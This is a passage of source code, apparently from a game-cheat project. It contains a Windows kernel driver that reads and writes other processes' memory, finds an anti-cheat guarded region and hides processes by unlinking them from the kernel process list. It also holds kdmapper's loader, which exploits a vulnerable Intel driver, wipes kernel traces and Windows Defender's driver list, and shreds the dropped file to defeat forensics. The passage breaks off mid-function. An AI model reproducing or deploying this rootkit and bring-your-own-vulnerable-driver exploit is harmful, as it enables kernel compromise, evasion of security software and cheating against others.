{ 134 | MM_COPY_ADDRESS readable = { 0 }; 135 | readable.PhysicalAddress.QuadPart = (LONGLONG)Address; 136 | 137 | return MmCopyMemory(buffer, readable, size, MM_COPY_MEMORY_PHYSICAL, bytes_read); 138 | } 139 | 140 | NTSTATUS write_physical(PVOID Address, PVOID buffer, SIZE_T size, SIZE_T* bytes_read) { 141 | if (!Address) return STATUS_UNSUCCESSFUL; 142 | 143 | PHYSICAL_ADDRESS writable = { 0 }; 144 | writable.QuadPart = LONGLONG(Address); 145 | 146 | PVOID mapped_memory = MmMapIoSpaceEx(writable, size, PAGE_READWRITE); 147 | if (!mapped_memory) return STATUS_UNSUCCESSFUL; 148 | 149 | memcpy(mapped_memory, buffer, size); 150 | *bytes_read = size; 151 | 152 | MmUnmapIoSpace(mapped_memory, size); 153 | 154 | return STATUS_SUCCESS; 155 | } 156 | // 结尾 157 | } 158 | 159 | namespace utility_functions { 160 | // 获取进程的 CR3（页表基址） 161 | UINT64 get_process_cr3(PEPROCESS process) { 162 | PUCHAR process_byte = (PUCHAR)process; 163 | ULONG_PTR process_directory_base = *(PULONG_PTR)(process_byte + 0x28); 164 | 165 | if (process_directory_base == 0) { 166 | INT32 directory_table_base = get_windows_version(); 167 | 168 | ULONG_PTR process_directory_table_base = *(PULONG_PTR)(process_byte + directory_table_base); 169 | return process_directory_table_base; 170 | } 171 | 172 | return process_directory_base; 173 | } 174 | 175 | UINT64 translate_virtual_address(UINT64 directory_table_base, UINT64 virtual_address) { 176 | directory_table_base &= ~0xf; // 对齐目录表 177 | 178 | UINT64 page_offset = virtual_address & ~(~0ul << 12); // 12 = 页面偏移大小 179 | 180 | UINT64 pte = ((virtual_address >> 12) & (0x1ffll)); // 'page table entry' 181 | UINT64 pt = ((virtual_address >> 21) & (0x1ffll)); // 'page table' 182 | UINT64 pd = ((virtual_address >> 30) & (0x1ffll)); // 'page directory' 183 | UINT64 pdp = ((virtual_address >> 39) & (0x1ffll)); // 'page directory pointer' 184 | 185 | SIZE_T buffer = 0; 186 | 187 | UINT64 _pdp = 0; 188 | driver_functions::read_physical(PVOID(directory_table_base + 8 * pdp), &_pdp, sizeof(_pdp), &buffer); 189 | if (~_pdp & 1) return 0; 190 | 191 | UINT64 pde = 0; 192 | driver_functions::read_physical(PVOID((_pdp & PMASK) + 8 * pd), &pde, sizeof(pde), &buffer); 193 | if (~pde & 1) return 0; 194 | 195 | if (pde & 0x80) // 处理 1GB 页面 196 | return (pde & (~0ull << 42 >> 12)) + (virtual_address & ~(~0ull << 30)); 197 | 198 | UINT64 _pte = 0; 199 | driver_functions::read_physical(PVOID((pde & PMASK) + 8 * pt), &_pte, sizeof(_pte), &buffer); 200 | if (~_pte & 1) return 0; 201 | 202 | if (_pte & 0x80) // 通过 PTE 处理 2MB 页面 203 | return (_pte & PMASK) + (virtual_address & ~(~0ull << 21)); 204 | 205 | // 正常 4KB 页面 — 读取最终页表条目 206 | virtual_address = 0; 207 | driver_functions::read_physical(PVOID((_pte & PMASK) + 8 * pte), &virtual_address, sizeof(virtual_address), &buffer); 208 | virtual_address &= PMASK; 209 | 210 | if (!virtual_address) 211 | return 0; 212 | 213 | return virtual_address + page_offset; 214 | } 215 | } 216 | 217 | namespace io_handlers { 218 | NTSTATUS handle_physical_request(p_physical_rw request) { 219 | if (request->SecurityCode != SECURITY_CODE) return STATUS_UNSUCCESSFUL; 220 | if (!request->ProcessID) return STATUS_UNSUCCESSFUL; 221 | 222 | PEPROCESS process = NULL; 223 | PsLookupProcessByProcessId((HANDLE)request->ProcessID, &process); // 根据进程ID查找进程 224 | if (!process) return STATUS_UNSUCCESSFUL; 225 | 226 | ULONGLONG process_base = utility_functions::get_process_cr3(process); 227 | ObDereferenceObject(process); 228 | 229 | SIZE_T this_offset = NULL; 230 | SIZE_T total_size = request->Size; 231 | 232 | // 使用进程的 CR3 将虚拟地址转换为物理地址 233 | UINT64 physical_address = utility_functions::translate_virtual_address(process_base, (ULONG64)request->Address + this_offset); 234 | if (!physical_address) 235 | return STATUS_UNSUCCESSFUL; 236 | 237 | // 计算最终读取或写入的大小，确保不超过页面边界 238 | ULONG64 final_size = ( 239 | ((PAGE_SIZE - (physical_address & 0xFFF)) < (SIZE_T)total_size) ? 240 | (PAGE_SIZE - (physical_address & 0xFFF)) : (SIZE_T)total_size 241 | ); 242 | 243 | if (request->Type) // 如果类型等于 'true'，则改为写 244 | driver_functions::write_physical(PVOID(physical_address), (PVOID)((ULONG64)request->Buffer + this_offset), final_size, &request->ReturnSize); 245 | else 246 | driver_functions::read_physical(PVOID(physical_address), (PVOID)((ULONG64)request->Buffer + this_offset), final_size, &request->ReturnSize); 247 | 248 | return STATUS_SUCCESS; 249 | } 250 | 251 | NTSTATUS handle_base_address_request(p_base_address request) { 252 | if (request->SecurityCode != SECURITY_CODE) return STATUS_UNSUCCESSFUL; 253 | if (!request->process_id) return STATUS_UNSUCCESSFUL; 254 | 255 | PEPROCESS process = NULL; 256 | NTSTATUS status = PsLookupProcessByProcessId((HANDLE)request->process_id, &process); 257 | 258 | if (!NT_SUCCESS(status)) 259 | return status; 260 | 261 | 262 | // 获取进程映像的基地址（即其可执行文件在内存中的加载位置） 263 | ULONGLONG image_base = (ULONGLONG)PsGetProcessSectionBaseAddress(process); 264 | if (!image_base) return STATUS_UNSUCCESSFUL; 265 | 266 | // 将镜像基地址复制到请求结构中的“地址”字段 267 | RtlCopyMemory(request->Address, &image_base, sizeof(image_base)); 268 | ObDereferenceObject(process); 269 | 270 | return STATUS_SUCCESS; 271 | } 272 | 273 | NTSTATUS get_gaurded_region(p_guarded_region request) { 274 | if (request->SecurityCode != SECURITY_CODE) return STATUS_UNSUCCESSFUL; 275 | 276 | ULONG info_size = 0; 277 | NTSTATUS status = ZwQuerySystemInformation(SystemBigPoolInformation, &info_size, 0, &info_size); 278 | 279 | if (!NT_SUCCESS(status)) 280 | return status; 281 | 282 | // 为系统池信息分配内存 283 | PSYSTEM_BIGPOOL_INFORMATION pool_info = 0; 284 | while (status == STATUS_INFO_LENGTH_MISMATCH) { 285 | if (pool_info) ExFreePool(pool_info); 286 | pool_info = (PSYSTEM_BIGPOOL_INFORMATION)ExAllocatePool(NonPagedPool, info_size); 287 | status = ZwQuerySystemInformation(SystemBigPoolInformation, pool_info, info_size, &info_size); 288 | } 289 | 290 | // 迭代池条目 291 | if (pool_info) { 292 | for (unsigned int i = 0; i < pool_info->Count; i++) { 293 | SYSTEM_BIGPOOL_ENTRY* entry = &pool_info->AllocatedInfo[i]; 294 | PVOID virtual_address; 295 | virtual_address = (PVOID)((uintptr_t)entry->VirtualAddress & ~1ull); 296 | SIZE_T size_bytes = entry->SizeInBytes; 297 | BOOLEAN is_non_paged = entry->NonPaged; 298 | 299 | // 检查非分页、特定大小和标签 300 | if (entry->NonPaged && entry->SizeInBytes == 0x200000) { 301 | UCHAR expected_tag[] = "TnoC"; // 标签应该是一个字符串，而不是无符号长整型 302 | if (memcmp(entry->Tag, expected_tag, sizeof(expected_tag)) == 0) { 303 | RtlCopyMemory((void*)request->Address, &entry->VirtualAddress, sizeof(entry->VirtualAddress)); 304 | return STATUS_SUCCESS; 305 | } 306 | } 307 | } 308 | 309 | ExFreePool(pool_info); 310 | } 311 | 312 | return STATUS_SUCCESS; 313 | } 314 | 315 | NTSTATUS handle_hide_file(p_hide_file request) { 316 | if (request->security_code != SECURITY_CODE) return STATUS_UNSUCCESSFUL; 317 | if (!request->process_id) return STATUS_UNSUCCESSFUL; 318 | 319 | PEPROCESS process = NULL; 320 | NTSTATUS status = PsLookupProcessByProcessId((HANDLE)request->process_id, &process); 321 | 322 | if (!NT_SUCCESS(status)) 323 | return status; 324 | 325 | PLIST_ENTRY active_process_links = ((PLIST_ENTRY)((PCHAR)process + 0x448)); 326 | active_process_links->Blink->Flink = active_process_links->Flink; 327 | active_process_links->Flink->Blink = active_process_links->Blink; 328 | 329 | return STATUS_SUCCESS; 330 | } 331 | } 332 | 333 | namespace major_functions { 334 | // MJ_CREATE 和 MJ_CLOSE 的默认调度程序 335 | NTSTATUS dispatcher(PDEVICE_OBJECT device_object, PIRP irp) { 336 | UNREFERENCED_PARAMETER(device_object); 337 | 338 | IoCompleteRequest(irp, IO_NO_INCREMENT); 339 | 340 | return irp->IoStatus.Status; 341 | } 342 | 343 | // 主 I/O 处理程序用于处理我们的虚拟/物理/基地址/鼠标请求 344 | NTSTATUS io_controller(PDEVICE_OBJECT device_object, PIRP irp) { 345 | UNREFERENCED_PARAMETER(device_object); 346 | 347 | if (KeGetCurrentIrql() != PASSIVE_LEVEL) { // crash fix 348 | irp->IoStatus.Status = STATUS_UNSUCCESSFUL; 349 | irp->IoStatus.Information = 0; 350 | IoCompleteRequest(irp, IO_NO_INCREMENT); 351 | return STATUS_UNSUCCESSFUL; 352 | } 353 | 354 | NTSTATUS status = STATUS_UNSUCCESSFUL; 355 | ULONG bytes = {}; 356 | 357 | PIO_STACK_LOCATION stack = IoGetCurrentIrpStackLocation(irp); 358 | ULONG code = stack->Parameters.DeviceIoControl.IoControlCode; 359 | ULONG size = stack->Parameters.DeviceIoControl.InputBufferLength; 360 | 361 | // 用于虚拟函数 362 | static PEPROCESS virtual_target_process = nullptr; 363 | 364 | if (code == PRW_CODE) { 365 | if (size == sizeof(_PRW)) { 366 | p_physical_rw request = (p_physical_rw)(irp->AssociatedIrp.SystemBuffer); 367 | 368 | status = io_handlers::handle_physical_request(request); 369 | bytes = sizeof(_PRW); 370 | } 371 | else { 372 | status = STATUS_INFO_LENGTH_MISMATCH; 373 | bytes = 0; 374 | } 375 | } 376 | else if (code == VRW_ATTACH_CODE) { 377 | if (size == sizeof(_VRW)) { 378 | p_virtual_rw request = (p_virtual_rw)(irp->AssociatedIrp.SystemBuffer); 379 | 380 | status = PsLookupProcessByProcessId(request->ProcessHandle, &virtual_target_process); 381 | bytes = sizeof(_VRW); 382 | } 383 | else { 384 | status = STATUS_INFO_LENGTH_MISMATCH; 385 | bytes = 0; 386 | } 387 | } 388 | else if (code == VRW_CODE) { 389 | if (size == sizeof(_VRW)) { 390 | p_virtual_rw request = (p_virtual_rw)(irp->AssociatedIrp.SystemBuffer); 391 | 392 | if (request->Type) { 393 | if (virtual_target_process != nullptr) 394 | status = MmCopyVirtualMemory(PsGetCurrentProcess(), request->Buffer, virtual_target_process, request->Address, request->Size, KernelMode, &request->return_size); 395 | } 396 | else { 397 | if (virtual_target_process != nullptr) 398 | status = MmCopyVirtualMemory(virtual_target_process, request->Address, PsGetCurrentProcess(), request->Buffer, request->Size, KernelMode, &request->return_size); 399 | } 400 | 401 | bytes = sizeof(_VRW); 402 | } 403 | else { 404 | status = STATUS_INFO_LENGTH_MISMATCH; 405 | bytes = 0; 406 | } 407 | } 408 | else if (code == BA_CODE) { 409 | if (size == sizeof(_BA)) { 410 | p_base_address request = (p_base_address)(irp->AssociatedIrp.SystemBuffer); 411 | 412 | status = io_handlers::handle_base_address_request(request); 413 | bytes = sizeof(_BA); 414 | } 415 | else { 416 | status = STATUS_INFO_LENGTH_MISMATCH; 417 | bytes = 0; 418 | } 419 | } 420 | else if (code == GR_CODE) { 421 | if (size == sizeof(_GR)) { 422 | p_guarded_region request = (p_guarded_region)(irp->AssociatedIrp.SystemBuffer); 423 | 424 | status = io_handlers::get_gaurded_region(request); 425 | bytes = sizeof(_GR); 426 | } 427 | else { 428 | status = STATUS_INFO_LENGTH_MISMATCH; 429 | bytes = 0; 430 | } 431 | } 432 | else if (code == HF_CODE) { 433 | if (size == sizeof(_hf)) { 434 | p_hide_file request = (p_hide_file)(irp->AssociatedIrp.SystemBuffer); 435 | 436 | status = io_handlers::handle_hide_file(request); 437 | bytes = sizeof(_hf); 438 | } 439 | else { 440 | status = STATUS_INFO_LENGTH_MISMATCH; 441 | bytes = 0; 442 | } 443 | } 444 | else { 445 | status = STATUS_INVALID_DEVICE_REQUEST; 446 | bytes = 0; 447 | } 448 | 449 | irp->IoStatus.Status = status; 450 | irp->IoStatus.Information = bytes; 451 | IoCompleteRequest(irp, IO_NO_INCREMENT); 452 | 453 | return status; 454 | } 455 | } 456 | -------------------------------------------------------------------------------- /kdmapper/intel_driver.cpp: -------------------------------------------------------------------------------- 1 | #include "intel_driver.hpp" 2 | #include 3 | #include 4 | #include 5 | 6 | #include "utils.hpp" 7 | #include "intel_driver_resource.hpp" 8 | #include "service.hpp" 9 | #include "nt.hpp" 10 | 11 | #ifdef PDB_OFFSETS 12 | #include "KDSymbolsHandler.h" 13 | #endif 14 | 15 | /** 16 | Command structures 17 | */ 18 | typedef struct _COPY_MEMORY_BUFFER_INFO 19 | { 20 | uint64_t case_number; 21 | uint64_t reserved; 22 | uint64_t source; 23 | uint64_t destination; 24 | uint64_t length; 25 | }COPY_MEMORY_BUFFER_INFO, * PCOPY_MEMORY_BUFFER_INFO; 26 | 27 | typedef struct _FILL_MEMORY_BUFFER_INFO 28 | { 29 | uint64_t case_number; 30 | uint64_t reserved1; 31 | uint32_t value; 32 | uint32_t reserved2; 33 | uint64_t destination; 34 | uint64_t length; 35 | }FILL_MEMORY_BUFFER_INFO, * PFILL_MEMORY_BUFFER_INFO; 36 | 37 | typedef struct _GET_PHYS_ADDRESS_BUFFER_INFO 38 | { 39 | uint64_t case_number; 40 | uint64_t reserved; 41 | uint64_t return_physical_address; 42 | uint64_t address_to_translate; 43 | }GET_PHYS_ADDRESS_BUFFER_INFO, * PGET_PHYS_ADDRESS_BUFFER_INFO; 44 | 45 | typedef struct _MAP_IO_SPACE_BUFFER_INFO 46 | { 47 | uint64_t case_number; 48 | uint64_t reserved; 49 | uint64_t return_value; 50 | uint64_t return_virtual_address; 51 | uint64_t physical_address_to_map; 52 | uint32_t size; 53 | }MAP_IO_SPACE_BUFFER_INFO, * PMAP_IO_SPACE_BUFFER_INFO; 54 | 55 | typedef struct _UNMAP_IO_SPACE_BUFFER_INFO 56 | { 57 | uint64_t case_number; 58 | uint64_t reserved1; 59 | uint64_t reserved2; 60 | uint64_t virt_address; 61 | uint64_t reserved3; 62 | uint32_t number_of_bytes; 63 | }UNMAP_IO_SPACE_BUFFER_INFO, * PUNMAP_IO_SPACE_BUFFER_INFO; 64 | 65 | // End Command structures 66 | 67 | ULONG64 intel_driver::ntoskrnlAddr = 0; 68 | std::string cachedDriverName = ""; 69 | 70 | std::wstring intel_driver::GetDriverNameW() { 71 | if (cachedDriverName.empty()) { 72 | //Create a random name 73 | char buffer[100]{}; 74 | static const char alphanum[] = 75 | "abcdefghijklmnopqrstuvwxyz" 76 | "ABCDEFGHIJKLMNOPQRSTUVWXYZ"; 77 | int len = rand() % 20 + 10; 78 | for (int i = 0; i < len; ++i) 79 | buffer[i] = alphanum[rand() % (sizeof(alphanum) - 1)]; 80 | cachedDriverName = buffer; 81 | } 82 | 83 | std::wstring name(cachedDriverName.begin(), cachedDriverName.end()); 84 | return name; 85 | } 86 | 87 | std::wstring intel_driver::GetDriverPath() { 88 | std::wstring temp = utils::GetFullTempPath(); 89 | if (temp.empty()) { 90 | return L""; 91 | } 92 | return temp + L"\\" + GetDriverNameW(); 93 | } 94 | 95 | bool intel_driver::IsRunning() { 96 | const HANDLE file_handle = CreateFileW(L"\\\\.\\Nal", FILE_ANY_ACCESS, 0, nullptr, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, nullptr); 97 | if (file_handle != nullptr && file_handle != INVALID_HANDLE_VALUE) 98 | { 99 | CloseHandle(file_handle); 100 | return true; 101 | } 102 | return false; 103 | } 104 | 105 | //get Se debug privilege 106 | bool intel_driver::AcquireDebugPrivilege() { 107 | 108 | HMODULE ntdll = GetModuleHandleA("ntdll.dll"); 109 | if (ntdll == NULL) { 110 | return false; 111 | } 112 | 113 | ULONG SE_DEBUG_PRIVILEGE = 20UL; 114 | BOOLEAN SeDebugWasEnabled; 115 | NTSTATUS Status = nt::RtlAdjustPrivilege(SE_DEBUG_PRIVILEGE, TRUE, FALSE, &SeDebugWasEnabled); 116 | if (!NT_SUCCESS(Status)) { 117 | Log("[-] Failed to acquire SE_DEBUG_PRIVILEGE" << std::endl); 118 | return false; 119 | } 120 | 121 | return true; 122 | } 123 | 124 | HANDLE intel_driver::Load() { 125 | srand((unsigned)time(NULL) * GetCurrentThreadId()); 126 | 127 | //from https://github.com/ShoaShekelbergstein/kdmapper as some Drivers takes same device name 128 | if (intel_driver::IsRunning()) { 129 | Log(L"[-] \\Device\\Nal is already in use." << std::endl); 130 | Log(L"[-] This means that there is a intel driver already loaded or another instance of kdmapper is running or kdmapper crashed and didn't unload the previous driver." << std::endl); 131 | Log(L"[-] If you are sure that there is no other instance of kdmapper running, you can try to restart your computer to fix this issue." << std::endl); 132 | Log(L"[-] If the problem persists, you can try to unload the intel driver manually (If the driver was loaded with kdmapper will have a random name and will be located in %temp%), if not, the driver name is iqvw64e.sys." << std::endl); 133 | return INVALID_HANDLE_VALUE; 134 | } 135 | 136 | Log(L"[<] Loading vulnerable driver, Name: " << GetDriverNameW() << std::endl); 137 | 138 | std::wstring driver_path = GetDriverPath(); 139 | if (driver_path.empty()) { 140 | Log(L"[-] Can't find TEMP folder" << std::endl); 141 | return INVALID_HANDLE_VALUE; 142 | } 143 | 144 | _wremove(driver_path.c_str()); 145 | 146 | if (!utils::CreateFileFromMemory(driver_path, reinterpret_cast(intel_driver_resource::driver), sizeof(intel_driver_resource::driver))) { 147 | Log(L"[-] Failed to create vulnerable driver file" << std::endl); 148 | return INVALID_HANDLE_VALUE; 149 | } 150 | 151 | if (!AcquireDebugPrivilege()) { 152 | Log(L"[-] Failed to acquire SeDebugPrivilege" << std::endl); 153 | _wremove(driver_path.c_str()); 154 | return INVALID_HANDLE_VALUE; 155 | } 156 | 157 | if (!service::RegisterAndStart(driver_path, GetDriverNameW())) { 158 | Log(L"[-] Failed to register and start service for the vulnerable driver" << std::endl); 159 | _wremove(driver_path.c_str()); 160 | return INVALID_HANDLE_VALUE; 161 | } 162 | 163 | HANDLE result = CreateFileW(L"\\\\.\\Nal", GENERIC_READ | GENERIC_WRITE, 0, nullptr, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); 164 | 165 | if (!result || result == INVALID_HANDLE_VALUE) 166 | { 167 | Log(L"[-] Failed to load driver iqvw64e.sys" << std::endl); 168 | intel_driver::Unload(result); 169 | return INVALID_HANDLE_VALUE; 170 | } 171 | 172 | ntoskrnlAddr = utils::GetKernelModuleAddress("ntoskrnl.exe"); 173 | if (ntoskrnlAddr == 0) { 174 | Log(L"[-] Failed to get ntoskrnl.exe" << std::endl); 175 | intel_driver::Unload(result); 176 | return INVALID_HANDLE_VALUE; 177 | } 178 | 179 | //check MZ ntoskrnl.exe 180 | IMAGE_DOS_HEADER dosHeader = { 0 }; 181 | if (!intel_driver::ReadMemory(result, intel_driver::ntoskrnlAddr, &dosHeader, sizeof(IMAGE_DOS_HEADER)) || dosHeader.e_magic != IMAGE_DOS_SIGNATURE) { 182 | Log(L"[-] Can't exploit intel driver, is there any antivirus or anticheat running?" << std::endl); 183 | intel_driver::Unload(result); 184 | return INVALID_HANDLE_VALUE; 185 | } 186 | 187 | if (!intel_driver::ClearPiDDBCacheTable(result)) { 188 | Log(L"[-] Failed to ClearPiDDBCacheTable" << std::endl); 189 | intel_driver::Unload(result); 190 | return INVALID_HANDLE_VALUE; 191 | } 192 | 193 | if (!intel_driver::ClearKernelHashBucketList(result)) { 194 | Log(L"[-] Failed to ClearKernelHashBucketList" << std::endl); 195 | intel_driver::Unload(result); 196 | return INVALID_HANDLE_VALUE; 197 | } 198 | 199 | if (!intel_driver::ClearMmUnloadedDrivers(result)) { 200 | Log(L"[!] Failed to ClearMmUnloadedDrivers" << std::endl); 201 | intel_driver::Unload(result); 202 | return INVALID_HANDLE_VALUE; 203 | } 204 | 205 | if (!intel_driver::ClearWdFilterDriverList(result)) { 206 | Log("[!] Failed to ClearWdFilterDriverList" << std::endl); 207 | intel_driver::Unload(result); 208 | return INVALID_HANDLE_VALUE; 209 | } 210 | 211 | return result; 212 | } 213 | 214 | bool intel_driver::ClearWdFilterDriverList(HANDLE device_handle) { 215 | 216 | auto WdFilter = utils::GetKernelModuleAddress("WdFilter.sys"); 217 | if (!WdFilter) { 218 | Log("[+] WdFilter.sys not loaded, clear skipped" << std::endl); 219 | return true; 220 | } 221 | 222 | //#ifdef PDB_OFFSETS 223 | // uintptr_t MpBmDocOpenRules = KDSymbolsHandler::GetInstance()->GetOffset(L"MpBmDocOpenRules"); 224 | // if (!MpBmDocOpenRules) 225 | // { 226 | // Log("[-] Failed To Get MpBmDocOpenRules." << std::endl); 227 | // return false; 228 | // } 229 | // MpBmDocOpenRules += WdFilter; 230 | // 231 | // uintptr_t RuntimeDriversList_Head = MpBmDocOpenRules + 0x70; 232 | // uintptr_t RuntimeDriversCount = MpBmDocOpenRules + 0x60; 233 | // uintptr_t RuntimeDriversArray = MpBmDocOpenRules + 0x68; 234 | // ReadMemory(device_handle, RuntimeDriversArray, &RuntimeDriversArray, sizeof(uintptr_t)); 235 | // 236 | // uintptr_t MpFreeDriverInfoEx = KDSymbolsHandler::GetInstance()->GetOffset(L"MpFreeDriverInfoEx"); 237 | // if (!MpFreeDriverInfoEx) 238 | // { 239 | // Log("[-] Failed To Get MpFreeDriverInfoEx." << std::endl); 240 | // return false; 241 | // } 242 | // MpFreeDriverInfoEx += WdFilter; 243 | //#else 244 | auto RuntimeDriversList = FindPatternInSectionAtKernel(device_handle, "PAGE", WdFilter, (PUCHAR)"\x48\x8B\x0D\x00\x00\x00\x00\xFF\x05", "xxx????xx"); 245 | if (!RuntimeDriversList) { 246 | Log("[!] Failed to find WdFilter RuntimeDriversList" << std::endl); 247 | return false; 248 | } 249 | 250 | auto RuntimeDriversCountRef = FindPatternInSectionAtKernel(device_handle, "PAGE", WdFilter, (PUCHAR)"\xFF\x05\x00\x00\x00\x00\x48\x39\x11", "xx????xxx"); 251 | if (!RuntimeDriversCountRef) { 252 | Log("[!] Failed to find WdFilter RuntimeDriversCount" << std::endl); 253 | return false; 254 | } 255 | 256 | // MpCleanupDriverInfo->MpFreeDriverInfoEx 23110 257 | /* 258 | 49 8B C9 mov rcx, r9 ; P 259 | 49 89 50 08 mov [r8+8], rdx 260 | E8 FB F0 FD FF call MpFreeDriverInfoEx 261 | 48 8B 0D FC AA FA FF mov rcx, cs:qword_1C0021BF0 262 | E9 21 FF FF FF jmp loc_1C007701A 263 | */ 264 | auto MpFreeDriverInfoExRef = FindPatternInSectionAtKernel(device_handle, "PAGE", WdFilter, (PUCHAR)"\x49\x8B\xC9\x00\x89\x00\x08\xE8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xE9", "xxx?x?xx???????????x"); 265 | if (!MpFreeDriverInfoExRef) { 266 | // 24010 267 | /* 268 | 48 89 4A 08 mov [rdx+8], rcx 269 | 49 8B C8 mov rcx, r8 ; P 270 | E8 C3 58 FE FF call sub_1C0065308 271 | 48 8B 0D 44 41 FA FF mov rcx, cs:qword_1C0023B90 272 | E9 39 FF FF FF jmp loc_1C007F98A 273 | */ 274 | MpFreeDriverInfoExRef = FindPatternInSectionAtKernel(device_handle, "PAGE", WdFilter, (PUCHAR)"\x48\x89\x4A\x00\x49\x8b\x00\xE8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xE9", "xxx?xx?x???????????x"); 275 | if (!MpFreeDriverInfoExRef) { 276 | Log("[!] Failed to find WdFilter MpFreeDriverInfoEx" << std::endl); 277 | return false; 278 | } 279 | else { 280 | Log("[+] Found WdFilter MpFreeDriverInfoEx with second pattern" << std::endl); 281 | } 282 | } 283 | 284 | MpFreeDriverInfoExRef += 0x7; // skip until call instruction 285 | 286 | RuntimeDriversList = (uintptr_t)ResolveRelativeAddress(device_handle, (PVOID)RuntimeDriversList, 3, 7); 287 | uintptr_t RuntimeDriversList_Head = RuntimeDriversList - 0x8; 288 | uintptr_t RuntimeDriversCount = (uintptr_t)ResolveRelativeAddress(device_handle, (PVOID)RuntimeDriversCountRef, 2, 6); 289 | uintptr_t RuntimeDriversArray = RuntimeDriversCount + 0x8; 290 | ReadMemory(device_handle, RuntimeDriversArray, &RuntimeDriversArray, sizeof(uintptr_t)); 291 | uintptr_t MpFreeDriverInfoEx = (uintptr_t)ResolveRelativeAddress(device_handle, (PVOID)MpFreeDriverInfoExRef, 1, 5); 292 | //#endif 293 | 294 | auto ReadListEntry = [&](uintptr_t Address) -> LIST_ENTRY* { // Useful lambda to read LIST_ENTRY 295 | LIST_ENTRY* Entry; 296 | if (!ReadMemory(device_handle, Address, &Entry, sizeof(LIST_ENTRY*))) return 0; 297 | return Entry; 298 | }; 299 | 300 | for (LIST_ENTRY* Entry = ReadListEntry(RuntimeDriversList_Head); 301 | Entry != (LIST_ENTRY*)RuntimeDriversList_Head; 302 | Entry = ReadListEntry((uintptr_t)Entry + (offsetof(struct _LIST_ENTRY, Flink)))) 303 | { 304 | UNICODE_STRING Unicode_String; 305 | if (ReadMemory(device_handle, (uintptr_t)Entry + 0x10, &Unicode_String, sizeof(UNICODE_STRING))) { 306 | auto ImageName = std::make_unique((ULONG64)Unicode_String.Length / 2ULL + 1ULL); 307 | if (ReadMemory(device_handle, (uintptr_t)Unicode_String.Buffer, ImageName.get(), Unicode_String.Length)) { 308 | if (wcsstr(ImageName.get(), intel_driver::GetDriverNameW().c_str())) { 309 | 310 | //remove from RuntimeDriversArray 311 | bool removedRuntimeDriversArray = false; 312 | PVOID SameIndexList = (PVOID)((uintptr_t)Entry - 0x10); 313 | for (int k = 0; k < 256; k++) { // max RuntimeDriversArray elements 314 | PVOID value = 0; 315 | ReadMemory(device_handle, RuntimeDriversArray + (k * 8), &value, sizeof(PVOID)); 316 | if (value == SameIndexList) { 317 | PVOID emptyval = (PVOID)(RuntimeDriversCount + 1); // this is not count+1 is position of cout addr+1 318 | WriteMemory(device_handle, RuntimeDriversArray + (k * 8), &emptyval, sizeof(PVOID)); 319 | removedRuntimeDriversArray = true; 320 | break; 321 | } 322 | } 323 | 324 | if (!removedRuntimeDriversArray) { 325 | Log("[!] Failed to remove from RuntimeDriversArray" << std::endl); 326 | return false; 327 | } 328 | 329 | auto NextEntry = ReadListEntry(uintptr_t(Entry) + (offsetof(struct _LIST_ENTRY, Flink))); 330 | auto PrevEntry = ReadListEntry(uintptr_t(Entry) + (offsetof(struct _LIST_ENTRY, Blink))); 331 | 332 | WriteMemory(device_handle, uintptr_t(NextEntry) + (offsetof(struct _LIST_ENTRY, Blink)), &PrevEntry, sizeof(LIST_ENTRY::Blink)); 333 | WriteMemory(device_handle, uintptr_t(PrevEntry) + (offsetof(struct _LIST_ENTRY, Flink)), &NextEntry, sizeof(LIST_ENTRY::Flink)); 334 | 335 | // decrement RuntimeDriversCount 336 | ULONG current = 0; 337 | ReadMemory(device_handle, RuntimeDriversCount, ¤t, sizeof(ULONG)); 338 | current--; 339 | WriteMemory(device_handle, RuntimeDriversCount, ¤t, sizeof(ULONG)); 340 | 341 | // call MpFreeDriverInfoEx 342 | uintptr_t DriverInfo = (uintptr_t)Entry - 0x20; 343 | 344 | //verify DriverInfo Magic 345 | USHORT Magic = 0; 346 | ReadMemory(device_handle, DriverInfo, &Magic, sizeof(USHORT)); 347 | if (Magic != 0xDA18) { 348 | Log("[!] DriverInfo Magic is invalid, new wdfilter version?, driver info will not be released to prevent bsod" << std::endl); 349 | } 350 | else { 351 | CallKernelFunction(device_handle, nullptr, MpFreeDriverInfoEx, DriverInfo); 352 | } 353 | 354 | Log("[+] WdFilterDriverList Cleaned: " << ImageName << std::endl); 355 | return true; 356 | } 357 | } 358 | } 359 | } 360 | return false; 361 | } 362 | 363 | bool intel_driver::Unload(HANDLE device_handle) { 364 | Log(L"[<] Unloading vulnerable driver" << std::endl); 365 | 366 | if (device_handle && device_handle != INVALID_HANDLE_VALUE) { 367 | CloseHandle(device_handle); 368 | } 369 | 370 | if (!service::StopAndRemove(GetDriverNameW())) 371 | return false; 372 | 373 | std::wstring driver_path = GetDriverPath(); 374 | 375 | //Destroy disk information before unlink from disk to prevent any recover of the file 376 | std::ofstream file_ofstream(driver_path.c_str(), std::ios_base::out | std::ios_base::binary); 377 | int newFileLen = sizeof(intel_driver_resource::driver) + (((long long)rand()*(long long)rand()) % 2000000 + 1000); 378 | BYTE* randomData = new BYTE[newFileLen]; 379 | for (size_t i = 0; i < newFileLen; i++) { 380 | randomData[i] = (BYTE)(rand() % 255); 381 | } 382 | if (!file_ofstream.write((char*)randomData, newFileLen)) { 383 | Log(L"[!] Error dumping shit inside the disk" << std::endl); 384 | } 385 | else { 386 | Log(L"[+] Vul driver data destroyed before unlink" << std::endl); 387 | } 388 | file_ofstream.close(); 389 | delete[] randomData; 390 | 391 | //unlink the file 392 | if (_wremove(driver_path.c_str()) != 0) 393 | return false; 394 | 395 | return true; 396 | } 397 | 398 | bool intel_driver::MemCopy(HANDLE device_handle, uint64_t destination, uint64_t source, uint64_t size) { 399 | if (!destination || !source || !size) 400 | return 0; 401 | 402 | COPY_MEMORY_BUFFER_INFO copy_memory_buffer = { 0 }; 403 | 404 | copy_memory_buffer.case_number = 0x33; 405 | copy_memory_buffer.source = source; 406 | copy_memory_buffer.destination = destination; 407 | copy_memory_buffer.length = size; 408 | 409 | DWORD bytes_returned = 0; 410 | return DeviceIoControl(device_handle, ioctl1, ©_memory_buffer, sizeof(copy_memory_buffer), nullptr, 0, &bytes_returned, nullptr); 411 | } 412 | 413 | bool intel_driver::SetMemory(HANDLE device_handle, uint64_t address, uint32_t value, uint64_t size) { 414 | if (!address || !size) 415 | return 0; 416 | 417 | FILL_MEMORY_BUFFER_INFO fill_memory_buffer = { 0 }; 418 | 419 | 